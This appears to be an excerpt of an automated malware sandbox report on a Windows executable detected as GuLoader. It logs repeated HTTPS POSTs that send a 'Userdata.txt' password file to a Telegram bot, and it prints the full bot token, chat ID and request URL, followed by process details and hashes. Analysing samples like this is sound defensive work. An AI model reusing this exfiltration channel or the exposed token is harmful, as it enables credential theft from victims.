                                                                                                        2025-01-11 06:20:32 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 30 36 38 38 32 33 66 36 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd32068823f644Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-11 06:20:32 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Sat, 11 Jan 2025 06:20:32 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 535
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-11 06:20:32 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 35 39 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 39 35 30 34 33 35 34 38 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 78 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 78 78 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 37 35 38 35 39 31 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 52 65 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 65 78 41 62 65 6c 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 34 33 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":5949,"from":{"id":7950435483,"is_bot":true,"first_name":"vandroxx","username":"vandroxx_bot"},"chat":{"id":6897585916,"first_name":"Rex","username":"RexAbel1","type":"private"},"date":1736576432,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        5192.168.2.949717149.154.167.2204438088C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-11 06:20:33 UTC270OUTPOST /bot7950435483:AAFkeNvnoegSYKyL7niKKZ3tPB62z3LQcco/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd3219f29a7316
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        2025-01-11 06:20:33 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 31 39 66 32 39 61 37 33 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd3219f29a7316Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-11 06:20:33 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Sat, 11 Jan 2025 06:20:33 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-11 06:20:33 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 35 39 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 39 35 30 34 33 35 34 38 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 78 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 78 78 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 37 35 38 35 39 31 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 52 65 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 65 78 41 62 65 6c 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 34 33 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":5950,"from":{"id":7950435483,"is_bot":true,"first_name":"vandroxx","username":"vandroxx_bot"},"chat":{"id":6897585916,"first_name":"Rex","username":"RexAbel1","type":"private"},"date":1736576433,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        6192.168.2.949719149.154.167.2204438088C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-11 06:20:36 UTC294OUTPOST /bot7950435483:AAFkeNvnoegSYKyL7niKKZ3tPB62z3LQcco/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd32385951aceb
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-11 06:20:36 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 33 38 35 39 35 31 61 63 65 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd32385951acebContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-11 06:20:36 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Sat, 11 Jan 2025 06:20:36 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-11 06:20:36 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 35 39 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 39 35 30 34 33 35 34 38 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 78 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 78 78 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 37 35 38 35 39 31 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 52 65 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 65 78 41 62 65 6c 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 34 33 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":5951,"from":{"id":7950435483,"is_bot":true,"first_name":"vandroxx","username":"vandroxx_bot"},"chat":{"id":6897585916,"first_name":"Rex","username":"RexAbel1","type":"private"},"date":1736576436,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        7192.168.2.949721149.154.167.2204438088C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-11 06:20:37 UTC294OUTPOST /bot7950435483:AAFkeNvnoegSYKyL7niKKZ3tPB62z3LQcco/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd3248dfac04a0
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-11 06:20:37 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 34 38 64 66 61 63 30 34 61 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd3248dfac04a0Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-11 06:20:37 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Sat, 11 Jan 2025 06:20:37 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-11 06:20:37 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 35 39 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 39 35 30 34 33 35 34 38 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 78 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 78 78 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 37 35 38 35 39 31 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 52 65 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 65 78 41 62 65 6c 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 34 33 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":5952,"from":{"id":7950435483,"is_bot":true,"first_name":"vandroxx","username":"vandroxx_bot"},"chat":{"id":6897585916,"first_name":"Rex","username":"RexAbel1","type":"private"},"date":1736576437,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        8192.168.2.949723149.154.167.2204438088C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-11 06:20:39 UTC294OUTPOST /bot7950435483:AAFkeNvnoegSYKyL7niKKZ3tPB62z3LQcco/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd32595b5c71f3
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-11 06:20:39 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 35 39 35 62 35 63 37 31 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd32595b5c71f3Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-11 06:20:39 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Sat, 11 Jan 2025 06:20:39 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-11 06:20:39 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 35 39 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 39 35 30 34 33 35 34 38 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 78 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 78 78 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 37 35 38 35 39 31 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 52 65 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 65 78 41 62 65 6c 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 34 33 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":5953,"from":{"id":7950435483,"is_bot":true,"first_name":"vandroxx","username":"vandroxx_bot"},"chat":{"id":6897585916,"first_name":"Rex","username":"RexAbel1","type":"private"},"date":1736576439,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        9192.168.2.949725149.154.167.2204438088C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-11 06:20:40 UTC294OUTPOST /bot7950435483:AAFkeNvnoegSYKyL7niKKZ3tPB62z3LQcco/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd326b2a85fce9
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-11 06:20:40 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 36 62 32 61 38 35 66 63 65 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd326b2a85fce9Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-11 06:20:41 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Sat, 11 Jan 2025 06:20:41 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-11 06:20:41 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 35 39 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 39 35 30 34 33 35 34 38 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 78 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 78 78 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 37 35 38 35 39 31 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 52 65 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 65 78 41 62 65 6c 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 34 34 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":5954,"from":{"id":7950435483,"is_bot":true,"first_name":"vandroxx","username":"vandroxx_bot"},"chat":{"id":6897585916,"first_name":"Rex","username":"RexAbel1","type":"private"},"date":1736576441,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        10192.168.2.949727149.154.167.220443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-11 06:20:45 UTC294OUTPOST /bot7950435483:AAFkeNvnoegSYKyL7niKKZ3tPB62z3LQcco/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd31de2b830c3e
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-11 06:20:45 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 64 65 32 62 38 33 30 63 33 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd31de2b830c3eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-11 06:20:45 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Sat, 11 Jan 2025 06:20:45 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-11 06:20:45 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 35 39 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 39 35 30 34 33 35 34 38 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 78 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 78 78 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 37 35 38 35 39 31 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 52 65 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 65 78 41 62 65 6c 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 34 34 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":5955,"from":{"id":7950435483,"is_bot":true,"first_name":"vandroxx","username":"vandroxx_bot"},"chat":{"id":6897585916,"first_name":"Rex","username":"RexAbel1","type":"private"},"date":1736576445,"document":{"file_name":"U


                                                                                                        Click to jump to process

                                                                                                        Click to jump to process

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Click to jump to process

                                                                                                        Target ID:0
                                                                                                        Start time:01:18:35
                                                                                                        Start date:11/01/2025
                                                                                                        Path:C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\14lVOjBoI2.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:472'339 bytes
                                                                                                        MD5 hash:EBF8A74191898B4A5CD58FFE2035C1EE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2119760895.0000000002A1A000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        Target ID:5
                                                                                                        Start time:01:19:48
                                                                                                        Start date:11/01/2025
                                                                                                        Path:C:\Users\user\Desktop\14lVOjBoI2.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\14lVOjBoI2.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:472'339 bytes
